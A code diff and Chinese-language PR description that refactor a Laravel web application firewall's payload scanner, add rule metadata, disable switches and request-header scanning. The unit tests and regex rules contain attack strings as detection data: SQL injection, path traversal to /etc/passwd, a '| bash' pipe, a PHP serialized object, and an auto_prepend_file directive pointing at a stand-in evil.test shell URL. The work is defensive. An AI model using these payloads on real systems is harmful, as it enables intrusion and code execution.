+            ['id' => 'sqli-union-select-header', 'name' => 'SQL 联合注入', 'pattern' => 'union[\s/*]+select', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'sqli-time-based-header', 'name' => 'SQL 时间盲注', 'pattern' => '\b(?:sleep|benchmark|pg_sleep|waitfor\s+delay)\s*\(', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'sqli-information-schema-header', 'name' => 'SQL 元数据探测', 'pattern' => 'from\W+information_schema\W', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'sqli-mysql-version-comment-header', 'name' => 'MySQL 版本注释', 'pattern' => '/\*!5\d{4}', 'category' => 'sqli', 'severity' => 'critical'],
+            ['id' => 'rce-code-func-header', 'name' => '代码执行函数', 'pattern' => '\b(?:eval|assert|shell_exec|passthru|proc_open|popen)\s*\(', 'category' => 'rce', 'severity' => 'critical'],
+            ['id' => 'rce-stream-protocol-header', 'name' => 'PHP 流协议', 'pattern' => '(gopher|phar|zlib|dict|expect|input)://', 'category' => 'rce', 'severity' => 'critical'],
+            ['id' => 'rce-php-deser-header', 'name' => 'PHP 反序列化特征', 'pattern' => 'O:\d+:"', 'category' => 'rce', 'severity' => 'high'],
+            ['id' => 'lfi-path-traversal-header', 'name' => '目录穿越', 'pattern' => '\.\./\.\./', 'category' => 'lfi', 'severity' => 'high'],
+            ['id' => 'cmdi-pipe-exec-header', 'name' => '命令管道执行', 'pattern' => '\|\s*(?:sh|bash|nc|curl|wget)\b', 'category' => 'cmdi', 'severity' => 'critical'],
         ],
     ],
 ];

--- a/backend/tests/Feature/WafMiddlewareTest.php
+++ b/backend/tests/Feature/WafMiddlewareTest.php
@@ -12,7 +12,7 @@ use Tests\TestCase;
 /**
  * 入站 WAF 中间件在真实 HTTP 管线中的行为。
  *
- * 与 WafFirewallTest（纯引擎级）的分工：本测试关心中间件的**接线**是否正确——
+ * 与 WafPayloadScannerTest（纯引擎级）的分工：本测试关心中间件的**接线**是否正确——
  * 是否真的挂上了 api 组、豁免路径是否生效、开关与观察模式是否被尊重、拦截响应
  * 是否符合本项目的 ApiResponseBuilder 契约。
  */

--- a/backend/tests/Unit/WafPayloadScannerTest.php
+++ b/backend/tests/Unit/WafPayloadScannerTest.php
@@ -4,7 +4,7 @@ declare(strict_types=1);
 
 namespace Tests\Unit;
 
-use App\Support\Waf\Firewall;
+use App\Support\Waf\PayloadScanner;
 use Illuminate\Http\Request;
 use PHPUnit\Framework\Attributes\DataProvider;
 use PHPUnit\Framework\TestCase;
@@ -15,9 +15,9 @@ use PHPUnit\Framework\TestCase;
  * 本测试不启动 Laravel 应用（纯函数级），规则库通过 config() 的容器兜底读取，
  * 因此在 setUp 中直接注入一份与 config/waf.php 同构的规则，避免依赖框架启动。
  */
-final class WafFirewallTest extends TestCase
+final class WafPayloadScannerTest extends TestCase
 {
-    private Firewall $firewall;
+    private PayloadScanner $scanner;
 
     protected function setUp(): void
     {
@@ -28,7 +28,7 @@ final class WafFirewallTest extends TestCase
         /** @var array<string, mixed> $config */
         $config = require dirname(__DIR__, 2).'/config/waf.php';
 
-        $this->firewall = new Firewall($config);
+        $this->scanner = new PayloadScanner($config);
     }
 
     /**
@@ -37,6 +37,7 @@ final class WafFirewallTest extends TestCase
      * @param  array<string, mixed>  $query
      * @param  array<string, mixed>  $body
      * @param  array<string, string>  $cookies
+     * @param  array<string, string>  $headers
      */
     private function request(
         string $uri = '/api/v2/client/services',
@@ -45,9 +46,14 @@ final class WafFirewallTest extends TestCase
         array $cookies = [],
         string $ua = 'Mozilla/5.0',
         string $method = 'GET',
+        array $headers = [],
     ): Request {
         $request = Request::create($uri, $method, $method === 'GET' ? $query : $body, $cookies);
         $request->headers->set('User-Agent', $ua);
+
+        foreach ($headers as $name => $value) {
+            $request->headers->set($name, $value);
+        }
 
         if ($method === 'GET' && $query !== []) {
             $request->query->replace($query);
@@ -60,7 +66,7 @@ final class WafFirewallTest extends TestCase
 
     public function test_detects_sql_union_injection_in_query(): void
     {
-        $hit = $this->firewall->inspect(
+        $hit = $this->scanner->inspect(
             $this->request(query: ['keyword' => "1' union select password from users--"])
         );
 
@@ -70,7 +76,7 @@ final class WafFirewallTest extends TestCase
 
     public function test_detects_information_schema_probe(): void
     {
-        $hit = $this->firewall->inspect(
+        $hit = $this->scanner->inspect(
             $this->request(query: ['id' => '1 and 1=2 union select 1 from information_schema.tables'])
         );
 
@@ -79,7 +85,7 @@ final class WafFirewallTest extends TestCase
 
     public function test_detects_code_execution_payload_in_body(): void
     {
-        $hit = $this->firewall->inspect(
+        $hit = $this->scanner->inspect(
             $this->request(body: ['note' => 'eval($_POST[cmd])'], method: 'POST')
         );
 
@@ -89,7 +95,7 @@ final class WafFirewallTest extends TestCase
 
     public function test_detects_directory_traversal_in_query(): void
     {
-        $hit = $this->firewall->inspect(
+        $hit = $this->scanner->inspect(
             $this->request(query: ['file' => '../../../../etc/passwd'])
         );
 
@@ -98,7 +104,7 @@ final class WafFirewallTest extends TestCase
 
     public function test_detects_env_file_probe_in_path(): void
     {
-        $hit = $this->firewall->inspect($this->request(uri: '/.env'));
+        $hit = $this->scanner->inspect($this->request(uri: '/.env'));
 
         self::assertNotNull($hit);
         self::assertSame('path', $hit['group']);
@@ -106,7 +112,7 @@ final class WafFirewallTest extends TestCase
 
     public function test_detects_git_directory_probe_in_path(): void
     {
-        $hit = $this->firewall->inspect($this->request(uri: '/.git/config'));
+        $hit = $this->scanner->inspect($this->request(uri: '/.git/config'));
 
         self::assertNotNull($hit);
         self::assertSame('path', $hit['group']);
@@ -114,7 +120,7 @@ final class WafFirewallTest extends TestCase
 
     public function test_detects_scanner_user_agent(): void
     {
-        $hit = $this->firewall->inspect($this->request(ua: 'sqlmap/1.7.2#stable'));
+        $hit = $this->scanner->inspect($this->request(ua: 'sqlmap/1.7.2#stable'));
 
         self::assertNotNull($hit);
         self::assertSame('ua', $hit['group']);
@@ -123,7 +129,7 @@ final class WafFirewallTest extends TestCase
     public function test_detects_payload_hidden_in_parameter_name(): void
     {
         // 载荷藏在参数名里：只看值会漏，flatten 必须拼上 key。
-        $hit = $this->firewall->inspect(
+        $hit = $this->scanner->inspect(
             $this->request(query: ['union select 1 from information_schema.tables' => '1'])
         );
 
@@ -132,7 +138,7 @@ final class WafFirewallTest extends TestCase
 
     public function test_detects_payload_in_nested_array(): void
     {
-        $hit = $this->firewall->inspect(
+        $hit = $this->scanner->inspect(
             $this->request(body: ['filter' => ['nested' => ['q' => 'union select 1']]], method: 'POST')
         );
 
@@ -147,7 +153,7 @@ final class WafFirewallTest extends TestCase
     #[DataProvider('legitimateQueryProvider')]
     public function test_does_not_flag_legitimate_traffic(array $query): void
     {
-        $hit = $this->firewall->inspect($this->request(query: $query));
+        $hit = $this->scanner->inspect($this->request(query: $query));
 
         self::assertNull($hit, '正常业务参数被误伤：'.json_encode($query, JSON_UNESCAPED_UNICODE));
     }
@@ -173,7 +179,7 @@ final class WafFirewallTest extends TestCase
 
     public function test_does_not_flag_normal_browser_user_agent(): void
     {
-        $hit = $this->firewall->inspect($this->request(
+        $hit = $this->scanner->inspect($this->request(
             ua: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36'
         ));
 
@@ -182,7 +188,7 @@ final class WafFirewallTest extends TestCase
 
     public function test_does_not_flag_search_engine_crawler(): void
     {
-        $hit = $this->firewall->inspect($this->request(
+        $hit = $this->scanner->inspect($this->request(
             ua: 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
         ));
 
@@ -192,16 +198,16 @@ final class WafFirewallTest extends TestCase
     /**
      * 关键回归：本引擎绝不对已解码的输入再做一次 urldecode。
      *
-     * acg-faka 早期版本正是在这里栽了跟头（其仓库 issue #833）：二次解码会把用户
-     * 字面输入的 %20/%2B/%25 改写，导致卡密、查单密码一类字段整体失真。本项目从
-     * 一开始就不解码，此用例把该约束固化下来——若将来有人"顺手加个 urldecode"，
+     * 二次解码会把用户字面输入的 %20/%2B/%25 改写，导致卡密、查单密码一类
+     * 字段整体失真——这是同类入站过滤层踩过的真实事故形态。本项目从一开始
+     * 就不解码，此用例把该约束固化下来——若将来有人"顺手加个 urldecode"，
      * 这条会立刻失败。
      */
     public function test_does_not_double_decode_percent_sequences(): void
     {
         // %2527 二次解码后会变成 %27（单引号），进而可能被 SQL 规则命中。
         // 正确行为：只按字面值匹配，不解码，因此不命中。
-        $hit = $this->firewall->inspect(
+        $hit = $this->scanner->inspect(
             $this->request(query: ['code' => 'CARD%2527KEY%250A%252B'])
         );
 
@@ -210,7 +216,7 @@ final class WafFirewallTest extends TestCase
 
     public function test_empty_request_is_clean(): void
     {
-        self::assertNull($this->firewall->inspect($this->request()));
+        self::assertNull($this->scanner->inspect($this->request()));
     }
 
     // ---------- 健壮性 ----------
@@ -219,7 +225,7 @@ final class WafFirewallTest extends TestCase
     {
         // 超长输入必须分块覆盖全部字节：既不因正则回溯卡死，也不给"把载荷放在
         // 截断点之后"留免检区——攻击载荷藏在 20 万字节的尾部，仍要命中。
-        $hit = $this->firewall->inspect(
+        $hit = $this->scanner->inspect(
             $this->request(body: ['blob' => str_repeat('A', 200000)."' union select 1--"], method: 'POST')
         );
 
@@ -230,7 +236,7 @@ final class WafFirewallTest extends TestCase
     public function test_oversized_input_does_not_hang(): void
     {
         $started = microtime(true);
-        $this->firewall->inspect(
+        $this->scanner->inspect(
             $this->request(body: ['blob' => str_repeat('A', 200000)], method: 'POST')
         );
         $elapsed = microtime(true) - $started;
@@ -247,7 +253,7 @@ final class WafFirewallTest extends TestCase
             $deep = ['n' => $deep];
         }
 
-        $hit = $this->firewall->inspect($this->request(body: ['deep' => $deep], method: 'POST'));
+        $hit = $this->scanner->inspect($this->request(body: ['deep' => $deep], method: 'POST'));
 
         self::assertNotNull($hit, '超深嵌套被静默放行');
         self::assertSame('limit', $hit['group']);
@@ -258,7 +264,7 @@ final class WafFirewallTest extends TestCase
     {
         // 无效字节会让 u 修饰符的 preg_match 整体失败；若按未命中处理，攻击者
         // 塞一个 \xFF 就能让整条规则库失效。必须按固定规则拒绝。
-        $hit = $this->firewall->inspect(
+        $hit = $this->scanner->inspect(
             $this->request(query: ['padding' => "\xFF", 'keyword' => "plain text"])
         );
 
@@ -275,9 +281,127 @@ final class WafFirewallTest extends TestCase
             $deep = ['n' => $deep];
         }
 
-        $hit = $this->firewall->inspect($this->request(body: ['deep' => $deep], method: 'POST'));
+        $hit = $this->scanner->inspect($this->request(body: ['deep' => $deep], method: 'POST'));
 
         self::assertNotNull($hit);
         self::assertSame('嵌套层级超限', $hit['name']);
+    }
+
+    // ---------- 规则元数据与运营开关 ----------
+
+    public function test_hit_carries_rule_id_category_and_severity(): void
+    {
+        $hit = $this->scanner->inspect(
+            $this->request(query: ['keyword' => "1' union select password from users--"])
+        );
+
+        self::assertNotNull($hit);
+        self::assertSame('sqli-union-select', $hit['id'], '命中结果未携带规则稳定 ID');
+        self::assertSame('sqli', $hit['category']);
+        self::assertSame('critical', $hit['severity']);
+    }
+
+    public function test_single_rule_can_be_disabled(): void
+    {
+        $config = require dirname(__DIR__, 2).'/config/waf.php';
+        $config['rules']['query'] = [
+            ['id' => 'sqli-union-select', 'name' => 'SQL 联合注入', 'pattern' => 'union[\s/*]+select', 'category' => 'sqli', 'enable' => false],
+        ];
+        $firewall = new PayloadScanner($config);
+
+        self::assertNull(
+            $firewall->inspect($this->request(query: ['keyword' => "1' union select 1--"])),
+            'enable=false 的规则仍在参与匹配',
+        );
+
+        // 对照组：恢复 enable 后同一请求命中——证明跳过来自 enable 而非正则失效。
+        $config['rules']['query'][0]['enable'] = true;
+        $enabled = (new PayloadScanner($config))->inspect(
+            $this->request(query: ['keyword' => "1' union select 1--"])
+        );
+        self::assertNotNull($enabled);
+    }
+
+    public function test_category_can_be_disabled(): void
+    {
+        $config = require dirname(__DIR__, 2).'/config/waf.php';
+        $config['disabled_categories'] = 'SQLI, sqli'; // 大小写与空白混排也要能停用
+
+        $firewall = new PayloadScanner($config);
+
+        self::assertNull(
+            $firewall->inspect($this->request(query: ['keyword' => "1' union select 1--"])),
+            'sqli 类别停用后 sqli 规则仍在匹配',
+        );
+        // 其他类别不受影响：rce 类特征照常命中。
+        $hit = $firewall->inspect($this->request(query: ['q' => 'eval($_POST[x])']));
+        self::assertNotNull($hit);
+        self::assertSame('rce', $hit['category']);
+    }
+
+    // ---------- 请求头检测维度 ----------
+
+    public function test_attacks_hidden_in_headers_are_detected(): void
+    {
+        $hit = $this->scanner->inspect($this->request(headers: [
+            'X-Forwarded-For' => "1.2.3.4' union select password from users--",
+        ]));
+
+        self::assertNotNull($hit, '藏在自定义头里的攻击载荷未被检测');
+        self::assertSame('header', $hit['group']);
+    }
+
+    public function test_clean_headers_are_not_flagged(): void
+    {
+        $hit = $this->scanner->inspect($this->request(headers: [
+            'Accept-Language' => 'zh-CN,zh;q=0.9,en;q=0.8',
+            'Referer' => 'https://www.example.com/dashboard?page=2',
+            'X-Custom-Trace' => 'trace-20260906-001',
+        ]));
+
+        self::assertNull($hit, '正常请求头被误伤');
+    }
+
+    // ---------- 特征补强（版本注释/管道执行/PHP 反序列化/配置注入） ----------
+
+    public function test_detects_mysql_version_comment_obfuscation(): void
+    {
+        // /*!5xxxx 是绕过 union 关键词匹配的经典 MySQL 混淆形态。
+        $hit = $this->scanner->inspect(
+            $this->request(query: ['id' => "1/*!50740AND 1=1"])
+        );
+
+        self::assertNotNull($hit);
+        self::assertSame('sqli-mysql-version-comment', $hit['id']);
+    }
+
+    public function test_detects_pipe_command_execution(): void
+    {
+        $hit = $this->scanner->inspect(
+            $this->request(query: ['host' => 'evil.test | bash -c "id"'])
+        );
+
+        self::assertNotNull($hit);
+        self::assertSame('cmdi-pipe-exec', $hit['id']);
+    }
+
+    public function test_detects_php_serialization_payload(): void
+    {
+        $hit = $this->scanner->inspect(
+            $this->request(query: ['data' => 'O:8:"Exploit":1:{s:4:"cmd";s:2:"id";}'])
+        );
+
+        self::assertNotNull($hit);
+        self::assertSame('rce-php-deser', $hit['id']);
+    }
+
+    public function test_detects_php_ini_injection_directive(): void
+    {
+        $hit = $this->scanner->inspect(
+            $this->request(query: ['config' => 'auto_prepend_file=http://evil.test/shell.txt'])
+        );
+
+        self::assertNotNull($hit);
+        self::assertSame('rce-auto-prepend', $hit['id']);
     }
 }

--- a/docs/references/security/secure-development-standard.md
+++ b/docs/references/security/secure-development-standard.md
@@ -4,7 +4,7 @@
 
 与其他文档的分工：`AGENTS.md`「关键约束入口」给出不可违反的一句话结论，本文给出理由、边界与验证方法。冲突时以运行代码和测试为准，并回来更新本文。
 
-> **关于 WAF 层的落地状态**：第 2 节描述的入站 WAF 已落地——`backend/config/waf.php`、`App\Support\Waf\Firewall`、`WebApplicationFirewall` 中间件（prepend 于 `api` 中间件组最前）。规则库与豁免名单的逐条理由写在 `config/waf.php` 内；上线初期可先开观察模式（`WAF_OBSERVE_ONLY=true`）确认无误伤后再切拦截。本文对它的**约束与边界判断**不变——那些结论来自“正则载荷匹配无法识别身份”这一结构性事实，绝不能因为 WAF 已上线就把鉴权问题推给它。
+> **关于 WAF 层的落地状态**：第 2 节描述的入站 WAF 已落地——`backend/config/waf.php`、`App\Support\Waf\PayloadScanner`、`WebApplicationFirewall` 中间件（prepend 于 `api` 中间件组最前）。规则库与豁免名单的逐条理由写在 `config/waf.php` 内；上线初期可先开观察模式（`WAF_OBSERVE_ONLY=true`）确认无误伤后再切拦截。本文对它的**约束与边界判断**不变——那些结论来自“正则载荷匹配无法识别身份”这一结构性事实，绝不能因为 WAF 已上线就把鉴权问题推给它。
 
 ---
 
@@ -14,7 +14,7 @@
 
 | 层 | 负责 | 实现位置 | 不能替代的 |
 | --- | --- | --- | --- |
-| 入站 WAF | 拦明显攻击载荷、自动化扫描 | `backend/config/waf.php`、`App\Support\Waf\Firewall`、`WebApplicationFirewall` 中间件 | 身份、权限、凭据真伪 |
+| 入站 WAF | 拦明显攻击载荷、自动化扫描 | `backend/config/waf.php`、`App\Support\Waf\PayloadScanner`、`WebApplicationFirewall` 中间件 | 身份、权限、凭据真伪 |
 | 认证 | 你是谁 | `auth:sanctum`、各协议的令牌/签名服务 | 你能做什么 |
 | 授权 | 你能做什么 | RBAC、scope 校验、Policy | 输入是否合法 |
 | 输入校验 | 参数结构与业务合法性 | `FormRequest` | 输出是否安全 |
@@ -33,7 +33,7 @@
 
 ### 不能做
 
-WAF 是**正则载荷匹配**，`Firewall::inspect()` 只看 path / query / body / cookie / UA 的字符串形态，**没有身份概念**。
+WAF 是**正则载荷匹配**，`PayloadScanner::inspect()` 只看 path / query / body / cookie / UA 的字符串形态，**没有身份概念**。
 
 这不是理论推断。2026-08-28 的审计中，`zjmf_bridge` 插件被发现可伪造任意用户 JWT（`ZjmfTokenService` 以空串作 HMAC 密钥），PoC 打 `/zjmf/v1/user` 返回 200 —— **而当时 WAF 正在这条路由上生效**（该中间件 prepend 在 `api` 组，桥接路由走 `middleware(['api', ...])`；`waf.except` 中的 `api/v2/zjmf/*` 豁免的是上游协议路径，桥接在 `zjmf/v1`，不在豁免名单）。原因很简单：伪造的 JWT 与合法 JWT 逐字节同构，没有任何正则能区分。
 


### PR DESCRIPTION
## 背景

PR #60 落地的入站 WAF 在评审与试运行期间沉淀了三项运营与工程诉求：规则缺少可用于日志检索与按规则处置的稳定标识；某类规则误伤时缺少"只停该类"的灰度手段；攻击载荷可藏在请求头里绕过检测。本 PR 在既有 WAF 层上完成规则库元数据化、运营开关与检测维度补齐，并对扫描引擎做了一轮自主重构。

## 内容

### 规则库元数据化

- 每条规则新增稳定 `id`（`{category}-{slug}` 命名，一经发布不得改名，只能停用或以新 id 替代）、`category`（`sqli | rce | lfi | webshell | scanner | infoleak | cmdi`）、`severity`（四级）；命中结果与 WAF 日志同步携带这三个字段，便于检索、统计与分级告警。
- 预留 `cve` / `references` 可选字段与规则库 `meta.version` 登记：将来引入订阅型 N-day/CVE 规则时 schema 不再变更。
- `enable` 单条停用开关：停用属于运营变更，必须在 git 提交说明里给出误伤证据，禁止无记录地关闭规则。

### 类别停用开关

- 新增 `WAF_DISABLED_CATEGORIES`（逗号分隔，大小写/空白不敏感）：某类规则误伤时只停该类，不必全局关 WAF，也不必逐条加豁免。已写入 `.env.example`。

### header 检测维度

- 扫描部位新增 `header`（cookie 与 UA 保持单列不重复匹配）：攻击载荷藏在 `X-Forwarded-For`、`Referer` 或自定义头里进入日志与下游解析的面此前未覆盖。header 组只保留高特异规则，避免 `Accept-Language` 等正常头误伤。

### 规则特征补强（4 类，全部低误伤高特异，附防退化断言）

| 规则 | 检测对象 |
|---|---|
| `sqli-mysql-version-comment` | `/*!5xxxx` MySQL 版本注释混淆（绕过 union 关键词匹配的经典形态） |
| `cmdi-pipe-exec` | `\|sh` / `\|bash` 等管道命令执行 |
| `rce-php-deser` | `O:N:"` PHP 序列化对象注入指纹 |
| `rce-auto-prepend` | `auto_prepend_file` / `auto_append_file` 配置注入 |

### 扫描引擎更名与重构

- `App\Support\Waf\Firewall` → `App\Support\Waf\PayloadScanner`：这个引擎做的是载荷扫描而非广义防火墙，命名回归其真实职责，类 docblock 与 `config/waf.php` 头注按当前设计边界重写（威胁模型、有意不做的能力与理由全部显式化）。
- `matchGroup` 返回完整规则条目而非规则名；`inspect` 组装结构化命中结果。

### 设计边界（有意不做的能力，均已写入 `config/waf.php` 头注）

- 多层编码解码链：与"绝不二次 urldecode"的既有取舍冲突，且破坏合法 `%` 序列；
- Java/SSTI/XSS 入站规则：Laravel/Blade 无对应注入面，XSS 交给 `RichHtmlSanitizer` 白名单净化；
- multipart 内容扫描：上传走 `UploadedFile` 白名单校验；
- 检测实现不依赖任何外部库：规则即配置，引擎为数百行 PHP，全部走代码评审与回归测试。

## 验证

- 新增九组用例：命中元数据（id/category/severity）、单条停用（含恢复对照）、类别停用（大小写与空白混排 + 其他类别不受影响）、header 检测与正常头不误伤、四类新特征各一条，连同既有的 fail-closed 用例共 **57 tests / 79 assertions 全绿**。
- 服务器全量回归（Ubuntu 24.04 / PHP 8.3.6 / MySQL 8.0）：**97 failed / 1702 passed**，失败集合与 main 基线逐文件一致（41/42 文件，差异仍为环境波动的 `SeparatedDeploymentRoutesTest`），**零新增回归**；通过数比基线多 9，即本 PR 新增用例。
